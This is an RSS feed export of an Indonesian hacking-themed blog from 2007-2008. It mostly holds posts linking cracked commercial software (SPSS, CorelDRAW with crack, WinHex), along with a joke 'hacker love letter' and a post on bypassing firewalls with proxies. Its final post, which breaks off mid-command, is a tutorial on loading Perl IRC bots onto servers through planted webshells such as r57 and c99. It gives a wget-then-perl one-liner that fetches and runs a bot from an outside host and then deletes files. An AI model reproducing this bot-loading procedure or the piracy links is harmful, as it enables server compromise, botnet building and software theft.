<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-7712600665289475099</atom:id><lastBuildDate>Mon, 28 Nov 2011 00:49:24 +0000</lastBuildDate><title>Seni Internet Hacking</title><description></description><link>http://gresikblog.blogspot.com/</link><managingEditor>noreply@blogger.com (gresikblog)</managingEditor><generator>Blogger</generator><openSearch:totalResults>33</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-6867833875996061934</guid><pubDate>Thu, 31 Jan 2008 11:00:00 +0000</pubDate><atom:updated>2008-11-13T04:53:49.480-08:00</atom:updated><title></title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_vesrPh18MVk/R6GsnXnh4YI/AAAAAAAAABE/i7o3yF8ad80/s1600-h/XGWays_WinHex.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_vesrPh18MVk/R6GsnXnh4YI/AAAAAAAAABE/i7o3yF8ad80/s320/XGWays_WinHex.jpg" alt="" id="BLOGGER_PHOTO_ID_5161596440297988482" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;" class="center"&gt;X-Ways WinHex v14.7 SR-1 | 1.5mb&lt;br /&gt;&lt;i&gt;WinHex: Computer Forensics &amp;amp; Data Recovery Software, Hex Editor &amp;amp; Disk Editor&lt;br /&gt;Windows 98/Me/2000/XP/2003/Vista/2008&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;WinHex is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. An advanced tool for everyday and emergency use: inspect and edit all kinds of files, recover deleted files or lost data from hard drives with corrupt file systems or from digital camera cards.&lt;br /&gt;&lt;br /&gt;Features include (depending on the license type):&lt;br /&gt;&lt;br /&gt;-- Disk editor for hard disks, floppy disks, CD-ROM &amp;amp; DVD, ZIP, Smart Media, Compact Flash, ...&lt;br /&gt;-- Native support for FAT, NTFS, Ext2/3, ReiserFS, Reiser4, UFS, CDFS, UDF&lt;br /&gt;-- Built-in interpretation of RAID systems and dynamic disks&lt;br /&gt;-- Various data recovery techniques&lt;br /&gt;-- RAM editor, providing access to physical RAM and other processes' virtual memory&lt;br /&gt;-- Data interpreter, knowing 20 data types&lt;br /&gt;-- Editing data structures using templates (e.g. to repair partition table/boot sector)&lt;br /&gt;-- Concatenating and splitting files, unifying and dividing odd and even bytes/words&lt;br /&gt;-- Analyzing and comparing files&lt;br /&gt;-- Particularly flexible search and replace functions&lt;br /&gt;-- Disk cloning (under DOS with X-Ways Replica)&lt;br /&gt;-- Drive images &amp;amp; backups (optionally compressed or split into 650 MB archives)&lt;br /&gt;-- Programming interface (API) and scripting&lt;br /&gt;-- 256-bit AES encryption, checksums, CRC32, hashes (MD5, SHA-1, ...)&lt;br /&gt;-- Erase (wipe) confidential files securely, hard drive cleansing to protect your privacy&lt;br /&gt;-- Import all clipboard formats, incl. ASCII hex values&lt;br /&gt;-- Convert between binary, hex ASCII, Intel Hex, and Motorola S&lt;br /&gt;-- Character sets: ANSI ASCII, IBM ASCII, EBCDIC, (Unicode)&lt;br /&gt;-- Instant window switching. Printing. Random-number generator.&lt;br /&gt;-- Supports files &gt;4 GB. Very fast. Easy to use. Extensive online help. (more)&lt;br /&gt;&lt;br /&gt;Having all the bits and bytes in a computer at your fingertips has become a reality.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.paid4share.com/file/3273/X-Ways-WinHex-v14-7-SR-1-rar.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-6867833875996061934?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2008/01/x-ways-winhex-v14.html</link><author>noreply@blogger.com (gresikblog)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_vesrPh18MVk/R6GsnXnh4YI/AAAAAAAAABE/i7o3yF8ad80/s72-c/XGWays_WinHex.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-348425585706139269</guid><pubDate>Thu, 31 Jan 2008 10:55:00 +0000</pubDate><atom:updated>2008-11-13T04:53:49.629-08:00</atom:updated><title>Arial Audio Converter 2.3.58</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_vesrPh18MVk/R6Gp9Hnh4XI/AAAAAAAAAA8/OYkjbx0GsgI/s1600-h/Arial_Audio_Converter_2.3.58.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_vesrPh18MVk/R6Gp9Hnh4XI/AAAAAAAAAA8/OYkjbx0GsgI/s320/Arial_Audio_Converter_2.3.58.jpg" alt="" id="BLOGGER_PHOTO_ID_5161593515425259890" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Arial Audio Converter is a professinal audio conversion tools. It can convert audio formats between MP3, WMA, OGG, MP2, WAV( PCM, DSP, GSM, ADPCM), G721, G723, G726, VOX, ALAW, ULAW. Arial Audio Converter is an audio utility that converts file with built-in playback player. With this extremely easy to use software you can convert files in batch regardless of their source formats and target formats. Arial Audio Converter also supports playback with its built-in player.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;a href="http://depositfiles.com/files/3311691" target="_blank"&gt;http://depositfiles.com/files/3311691&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;http://www.megaupload.com/?d=EZOXHWWW&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-348425585706139269?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2008/01/arial-audio-converter-2358.html</link><author>noreply@blogger.com (gresikblog)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_vesrPh18MVk/R6Gp9Hnh4XI/AAAAAAAAAA8/OYkjbx0GsgI/s72-c/Arial_Audio_Converter_2.3.58.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-7376002299119906741</guid><pubDate>Thu, 31 Jan 2008 10:50:00 +0000</pubDate><atom:updated>2008-11-13T04:53:49.876-08:00</atom:updated><title>SPSS 11.5.1 For Windows</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_vesrPh18MVk/R6GpAnnh4VI/AAAAAAAAAAs/iCaGUbhfbsY/s1600-h/SPSS.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_vesrPh18MVk/R6GpAnnh4VI/AAAAAAAAAAs/iCaGUbhfbsY/s320/SPSS.jpg" alt="" id="BLOGGER_PHOTO_ID_5161592476043174226" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;" class="center"&gt;&lt;b&gt;SPSS 11.5.1&lt;/b&gt;&lt;br /&gt;RAR | RS | OS:Win | 463 Mb&lt;/div&gt;&lt;br /&gt;SPSS 11.5 will make it easier for my company to deliver well-crafted market research, providing clients with the critical information they require in order to make better business decisions.SPSS® 11.5 for Windows® and SPSS Server 11.5 for Window NT®/2000. This version of SPSS features a new clustering analysis technique, better reporting capabilities, improved data management and enhanced workflow.&lt;br /&gt;More than 250,000 organizations worldwide rely on SPSS for Windows for conducting survey research, database analysis and scientific research. An advanced statistical and data management package, SPSS 11.5 provides an easy-to-use, comprehensive offering for the entire analytical process – planning, data collection, data access and management, analysis, reporting and deployment.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/87920826/SPSS.part1.rar&lt;br /&gt;http://rapidshare.com/files/87923205/SPSS.part2.rar&lt;br /&gt;http://rapidshare.com/files/87922079/SPSS.part3.rar&lt;br /&gt;http://rapidshare.com/files/87924538/SPSS.part4.rar&lt;br /&gt;http://rapidshare.com/files/87910617/SPSS.part5.rar&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Pass: invincible2&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-7376002299119906741?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2008/01/spss-1151-for-windows.html</link><author>noreply@blogger.com (gresikblog)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_vesrPh18MVk/R6GpAnnh4VI/AAAAAAAAAAs/iCaGUbhfbsY/s72-c/SPSS.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-6423471053029909675</guid><pubDate>Thu, 31 Jan 2008 10:44:00 +0000</pubDate><atom:updated>2008-11-13T04:53:50.060-08:00</atom:updated><title>save2pc Pro v3.25</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_vesrPh18MVk/R6GnqXnh4UI/AAAAAAAAAAk/IFYwgP6joFc/s1600-h/save2pc_Pro.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_vesrPh18MVk/R6GnqXnh4UI/AAAAAAAAAAk/IFYwgP6joFc/s320/save2pc_Pro.jpg" alt="" id="BLOGGER_PHOTO_ID_5161590994279457090" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Save2pc is a tool that downloads videos from Youtube or Google Video and saves it as Avi or Mpeg or Flv file to your local computer. save2pc is a small, fast, useful, practical and powerful. It has a clean, simple interface. save2pc allows you to easily grab and save desired youtube video. The user interface of save2pc is very simple, so you don't need any technical knowledge to use it. No need to use scripts for web browsers. Just run save2pc and start downloading!&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;Simply paste the URL of a video into the program, press Start , and the AVI, MPEG or FLV file will be downloaded into the selected folder. You dont need any players to play flash video just play it on the defult media player clasic.&lt;br /&gt;&lt;br /&gt;- Easy to use&lt;br /&gt;- Download from Youtube&lt;br /&gt;- Download from Google Video&lt;br /&gt;- Save youtube video as an AVI file&lt;br /&gt;- Save youtube video as an MPEG file&lt;br /&gt;- Save youtube video as an FLV file&lt;br /&gt;&lt;br /&gt;save2pc will work with Windows 95, 98, Me, NT, 2000, XP, 2003, Vista operating systems.&lt;br /&gt;&lt;br /&gt;&lt;div class="center"&gt;&lt;b&gt;Download&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.paid4share.com/file/3263/Save2pc-Pro-v3-25-rar.html" target="_blank"&gt;Save2pc-Pro-v3-25&lt;/a&gt; (paid4share.com)&lt;br /&gt;---------------------------------------------------------------------------------------------&lt;br /&gt;&lt;b&gt;Mirror:&lt;br /&gt;&lt;a href="http://depositfiles.com/files/3317228" target="_blank"&gt;http://depositfiles.com/files/3317228&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://w13.easy-share.com/1698728121.html" target="_blank"&gt;http://w13.easy-share.com/1698728121.html&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;      &lt;div class="actions" style="display: none;"&gt;     &lt;a style="display: none;" href="http://avaxsphere.com/news_mgr/edit/186167" class="edit"&gt;Edit&lt;/a&gt;     &lt;a style="display: none;" href="http://avaxsphere.com/news_mgr/destroy/186167" class="del" onclick="if (confirm('Are you sure?')) { var f = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = this.href;var m = document.createElement('input'); m.setAttribute('type', 'hidden'); m.setAttribute('name', '_method'); m.setAttribute('value', 'post'); f.appendChild(m);f.submit(); };return false;"&gt;Del&lt;/a&gt;   &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-6423471053029909675?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2008/01/save2pc-pro-v325.html</link><author>noreply@blogger.com (gresikblog)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_vesrPh18MVk/R6GnqXnh4UI/AAAAAAAAAAk/IFYwgP6joFc/s72-c/save2pc_Pro.jpg' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-4965180305052791624</guid><pubDate>Thu, 31 Jan 2008 10:39:00 +0000</pubDate><atom:updated>2008-11-13T04:53:50.187-08:00</atom:updated><title>CorelDRAW Graphics Suite X4 Portable (14.0.0.567)</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_vesrPh18MVk/R6GmEXnh4TI/AAAAAAAAAAc/FxsXTFiisgk/s1600-h/99.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_vesrPh18MVk/R6GmEXnh4TI/AAAAAAAAAAc/FxsXTFiisgk/s320/99.jpg" alt="" id="BLOGGER_PHOTO_ID_5161589241932800306" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;CorelDRAW® Graphics Suite X4 lets &lt;/b&gt;you tackle creative graphics and design projects with confidence. Precision tools, market-leading file compatibility and high-quality content help you turn your creative ideas into professional results: from distinctive logos and signs, to striking marketing materials and eye-catching web graphics.&lt;br /&gt;&lt;br /&gt;&lt;div class="left"&gt;&lt;b&gt;CorelDRAW Graphics Suite X4 provides &lt;/b&gt;all of the graphics tools you need to:&lt;br /&gt;Illustrate : using powerful vector tools&lt;br /&gt;Layout : your designs&lt;br /&gt;Edit : and enhance digital images&lt;br /&gt;Convert : bitmap images to vector files&lt;br /&gt;&lt;br /&gt;Plus, CorelDRAW Graphics Suite X4 comes packed with additional applications and services to help meet your graphics needs. The suite truly offers the ultimate combination of superior design capabilities, speed, and ease of use.&lt;/div&gt;&lt;br /&gt;&lt;b&gt;New and Enhanced Features&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&gt;&gt; Streamline your workflow&lt;br /&gt;- Modernized user interface:&lt;br /&gt;The new, more intuitive user interface features redesigned icons, menus and control&lt;br /&gt;- CorelDRAW® ConceptShare™:&lt;br /&gt;Share your designs and ideas with colleagues and collaborate with clients in real time&lt;br /&gt;- Corel® PowerTRACE™ X4:&lt;br /&gt;Save time and enjoy more control with this enhanced and powerful bitmap-to-vector conversion solution&lt;br /&gt;- Windows® Color System:&lt;br /&gt;Closely match colors between Corel and Microsoft applications&lt;br /&gt;- Adobe® Color Management Module:&lt;br /&gt;Match colors between Corel and Adobe applications&lt;br /&gt;&lt;br /&gt;&gt;&gt; Find your design assets&lt;br /&gt;- Enhanced Windows Vista® integration:&lt;br /&gt;Organize projects and search for files&lt;br /&gt;- New, editable content:&lt;br /&gt;10,000 clipart images (40% new), 1,000 high-quality photos and more specialized fonts: includes 75 Windows Glyph List 4 (WGL4) with support for Greek, Cyrillic and other international character sets, as well as single-line engraving fonts and OpenType® cross-platform fonts&lt;br /&gt;- Redesigned New From Template dialog box:&lt;br /&gt;Easily find the right template for any job, and browse by keyword or industry&lt;br /&gt;- 80 professionally designed templates:&lt;br /&gt;With keywords, notes about design choices, output tips and ways to maintain good design when customizing templates&lt;br /&gt;&lt;br /&gt;&gt;&gt; Accelerate layout and text editing&lt;br /&gt;- Interactive tables:&lt;br /&gt;Create and import structured layouts for text and graphics&lt;br /&gt;- Independent page layers:&lt;br /&gt;Vary page layout within a multipage document&lt;br /&gt;- Live text formatting:&lt;br /&gt;Preview formatting changes before applying them&lt;br /&gt;- Integration with WhatTheFont™:&lt;br /&gt;Quickly identify fonts&lt;br /&gt;- Mirror paragraph text:&lt;br /&gt;Mirror text horizontally or vertically, or both&lt;br /&gt;&lt;br /&gt;&gt;&gt; Get inspired and gain knowledge&lt;br /&gt;- Welcome screen:&lt;br /&gt;Access recently used documents, templates, learning tools, and inspiring designs from one location&lt;br /&gt;- CorelDRAW® Handbook - Insights from the Experts:&lt;br /&gt;View impressive projects and learn from seasoned design professionals&lt;br /&gt;- Training videos:&lt;br /&gt;Delve into hours of new training videos&lt;br /&gt;- CorelTUTOR™:&lt;br /&gt;Access online, project-based instruction with new tutorials&lt;br /&gt;- CorelDRAW.com:&lt;br /&gt;Share designs, ideas and inspiration with this online community&lt;br /&gt;&lt;br /&gt;&gt;&gt; Discover advanced image-editing features&lt;br /&gt;- Support for RAW camera files:&lt;br /&gt;Interactive controls let you preview adjustments in real time&lt;br /&gt;- Straighten images:&lt;br /&gt;New, interactive controls make it fast and easy&lt;br /&gt;- Histogram feedback:&lt;br /&gt;Available with more features than ever before&lt;br /&gt;- Enhanced Tone Curve dialog box:&lt;br /&gt;Lets you adjust images with more precision&lt;br /&gt;- Streamlined page sizes:&lt;br /&gt;Reflect the geographic location of the user better&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 0);"&gt;&lt;b&gt;&lt;a href="http://rapidshare.com/files/87470775/Core1DR4W.Craphics.5uite.X4.Portable.rar" target="_blank"&gt;http://rapidshare.com/files/87470775/Core1DR4W.Craphics.5uite.X4.Portable.rar&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;      &lt;div class="actions" style="display: none;"&gt;     &lt;a style="display: none;" href="http://avaxsphere.com/news_mgr/edit/185869" class="edit"&gt;Edit&lt;/a&gt;     &lt;a style="display: none;" href="http://avaxsphere.com/news_mgr/destroy/185869" class="del" onclick="if (confirm('Are you sure?')) { var f = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = this.href;var m = document.createElement('input'); m.setAttribute('type', 'hidden'); m.setAttribute('name', '_method'); m.setAttribute('value', 'post'); f.appendChild(m);f.submit(); };return false;"&gt;Del&lt;/a&gt;   &lt;/div&gt;              &lt;div class="info"&gt;     &lt;b&gt;Posted By:&lt;/b&gt; redwhiterus     &lt;b&gt;Date:&lt;/b&gt; 30 Jan 2008 03:33   &lt;/div&gt;   &lt;div class="text"&gt;     Mirror: &lt;b&gt;&lt;a href="http://depositfiles.com/files/3298145" target="_blank"&gt;http://depositfiles.com/files/3298145&lt;/a&gt;&lt;br /&gt;------------------------------------------------------------&lt;br /&gt;&lt;/b&gt;Here is Installer + Crack&lt;br /&gt;&lt;br /&gt;RS Links:&lt;br /&gt;http://rapidshare.com/files/86367098/CDX4.part1.rar&lt;br /&gt;http://rapidshare.com/files/86367186/CDX4.part2.rar&lt;br /&gt;http://rapidshare.com/files/86367275/CDX4.part3.rar&lt;br /&gt;http://rapidshare.com/files/86367310/CDX4.part4.rar&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;   &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-4965180305052791624?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2008/01/coreldraw-graphics-suite-x4-portable.html</link><author>noreply@blogger.com (gresikblog)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_vesrPh18MVk/R6GmEXnh4TI/AAAAAAAAAAc/FxsXTFiisgk/s72-c/99.jpg' height='72' width='72'/><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-3510583991298149580</guid><pubDate>Tue, 13 Nov 2007 03:15:00 +0000</pubDate><atom:updated>2007-11-12T19:19:42.217-08:00</atom:updated><title>Surat Cinta Seorang Hacker</title><description>Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk&lt;br /&gt;mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku&lt;br /&gt;c:\&gt; nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang&lt;br /&gt;anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku&lt;br /&gt;seperti pecundang atau aku memang pecundang sejati whatever!&lt;br /&gt;Seandainya hatimu adalah sebuah system,&lt;br /&gt;ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection&lt;br /&gt;Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di&lt;br /&gt;hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.&lt;br /&gt;apa aku harus pasang backdor "Remote Connect-Back Shell"jadi aku&lt;br /&gt;tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti&lt;br /&gt;ini.&lt;br /&gt;Seandainya hatimu adalah sebuah system,&lt;br /&gt;saat semua request-ku diterima aku akan nogkrong terus di bugtraq&lt;br /&gt;untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku&lt;br /&gt;akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu&lt;br /&gt; aku akan pasang portsentry, dan menyeting error pagemu " The page&lt;br /&gt;cannot be found Coz Has Been Owned by Someone get out!" aku janji gak&lt;br /&gt;bakalan ada macelinious program atau service yang hidden, karena aku&lt;br /&gt;sangat sayang dan mencintaimu.&lt;br /&gt;Seandainya hatimu adalah sebuah system,&lt;br /&gt;jangan ada kata "You dont have permission to access it" untuk aku,&lt;br /&gt;kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus&lt;br /&gt;menjadi sang bidadari penyelamatku.&lt;br /&gt;Seandainya hatimu adalah sebuah system, ...?&lt;br /&gt;Tapi sayang hatimu bukanlah sebuah system,&lt;br /&gt;kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!&lt;br /&gt;Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah&lt;br /&gt;terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat&lt;br /&gt;menangkalnya selain ...kamu.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-3510583991298149580?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/surat-cinta-seorang-hacker.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-3291500165037991124</guid><pubDate>Mon, 05 Nov 2007 08:11:00 +0000</pubDate><atom:updated>2007-11-05T00:12:18.428-08:00</atom:updated><title>Hide Your IP, Surf Anonymous</title><description>Internet has become a fountain of information that most people use on a daily basis for information, education, entertainment, work and play. Unfortunately, the convenience of the Internet also comes with hidden dangers. Online crimes are on the rise and are constantly evolving technologically.&lt;br /&gt;&lt;br /&gt;With the web base proxy allows you to surf the world wide web safely and anonymously. In addition, this allows you to bypass Company/School firewalls and proxies, allowing you to browse your favourite blocked websites, such asmyspace.com and ebay.com at work or school, while your friends and colleagues cannot.&lt;br /&gt;&lt;br /&gt;There is thousand of web proxy that you can use. Below are sample of proxies:&lt;br /&gt;&lt;a href="http://www.1freeproxy.com/"&gt;http://www.1freeproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.proxygalaxy.com/"&gt;http://www.proxygalaxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.pussyproxy.com/"&gt;http://www.pussyproxy.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.freeproxyguru.com/"&gt;http://www.freeproxyguru.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.hotdogproxy.com/"&gt;http://www.hotdogproxy.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-3291500165037991124?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/hide-your-ip-surf-anonymous.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-4603868735055072285</guid><pubDate>Mon, 05 Nov 2007 08:08:00 +0000</pubDate><atom:updated>2007-11-05T00:10:17.488-08:00</atom:updated><title>Free Friendster Layouts</title><description>Dibawah ini adalah beberapa link untuk merubah code CSS atau mengkreasikan tampilan layout / skins friendster agar friendster kita terlihat lebih menarik.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.pingafriend.com/"&gt;http://www.pingafriend.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://spider-layouts.com/"&gt;http://spider-layouts.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://friendster-layouts.com/"&gt;http://friendster-layouts.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.friendsterlayouts.org/"&gt;http://www.friendsterlayouts.org/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.freefriendsterskins.com/"&gt;http://www.freefriendsterskins.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://friendster-skins.otezz.net/"&gt;http://friendster-skins.otezz.net/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.friendstercode.net/"&gt;http://www.friendstercode.net/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.pyzam.com/friendsterlayouts"&gt;http://www.pyzam.com/friendsterlayouts&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.freecodesource.com/friendster-layouts/"&gt;http://www.freecodesource.com/friendster-layouts/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-4603868735055072285?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/free-friendster-layouts.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-6983934390130315216</guid><pubDate>Mon, 05 Nov 2007 01:20:00 +0000</pubDate><atom:updated>2007-11-04T17:26:53.056-08:00</atom:updated><title>Buat bot perl dan botscan</title><description>&lt;p&gt;Saking banyaknya bot perl sampai-sampai jadi binggung mau pakai yang mana.&lt;br /&gt;ada yang botperl yang bisa scan trus bisa nmap, trus bisa juga di jadiin shell, banyak banget pilihannya……..&lt;/p&gt; &lt;p&gt;langsung aja dehh… pusing jadinya mikirin itu semuaa….&lt;/p&gt; &lt;p&gt;untuk load botperl peralatan yang sangat perlu adalah source botperlnya dan juga shell atau webshell yang ber-safe mode off.&lt;/p&gt; &lt;p&gt;kalau webshellnya ber-safe mode on, nggak bisa di gunakan untuk meload bot, soalnya nggak ada untuk memasukkan perintah, tapi lain halnya dengan menggunakan include. (lain waktu bahasnya yach…)&lt;br /&gt;yang ber-safe mode on bisa di gunakan untuk membuat botphp dengan cara injek lihat cara buatnya di &lt;a href="http://samada.wordpress.com/2007/06/07/buat-bot-php-dengan-injekan" target="_blank"&gt;buat-bot-php-dengan-injekan&lt;/a&gt; dengan injekan.&lt;br /&gt;kalau yang webshell safe mode off bisa untuk meload botperl karena ada untuk mengetikan perintah.&lt;/p&gt; &lt;p&gt;kalau udah ada source botperl dan juga target tinggal lanjutkan dengan meload bot.&lt;/p&gt; &lt;p&gt;sebenarnya masih banyak jalan untuk bisa meload bot, sama halnya dengan bot-bot yang lain.&lt;br /&gt;yang lebih enak juga kalau udah ada web hosting sendiri sebagai penyimpanan data source code bot, atau juga injekan-injekannya sepeti r57shell, c99shell atau c100, dan juga GFSshell dEel El deh.&lt;/p&gt; &lt;p&gt;kalau memang nggak ada web hosting yach tinggal di buat aja ko, gampang banget, khan banyak situs gratis tuhh yach jadiin aja tuh tempat nyimpen data, khan enakk….. untuk web yang gratis dapat di lihat di &lt;a href="http://samada.wordpress.com/2007/05/25/free-web-hosting" target="_blank"&gt;free-web-hosting&lt;/a&gt;&lt;/p&gt; &lt;p&gt;singkatnya, yang di butuhkan adalah :&lt;br /&gt;1. web/situs/webhosting.&lt;br /&gt;untuk menyimpan source code, injekan, atau data lain.&lt;br /&gt;2. source code botperl.&lt;br /&gt;kalau nggak ada sourcenya, yach nggak jadi deh buatnya, paling botnya masuk chan orang lain kalau kamu load pake botorang lain &lt;img src="http://samada.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt; .&lt;br /&gt;3. shell/webshell.&lt;br /&gt;kalau webshell yang ber-safe mode off.&lt;br /&gt;kalau semua udah ada tinggal kerjaannya langsung atau loadbotnya langsung.&lt;/p&gt; &lt;p&gt;langkah kerjanya :&lt;/p&gt; &lt;p&gt;kalau untuk sekaligus menjalankannya.&lt;br /&gt;&lt;strong&gt;&lt;em&gt;wget&lt;/em&gt;&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;&lt;span style="color:#00ff00;"&gt;http://henca.prohosts.org/chibot.txt&lt;/span&gt;;&lt;span style="color:#0000ff;"&gt;chmod 755 perl chibot.txt&lt;/span&gt;;&lt;span style="color:#ffff00;"&gt;perl chibot.txt&lt;/span&gt;;&lt;span style="color:#ff00ff;"&gt;rm -rf 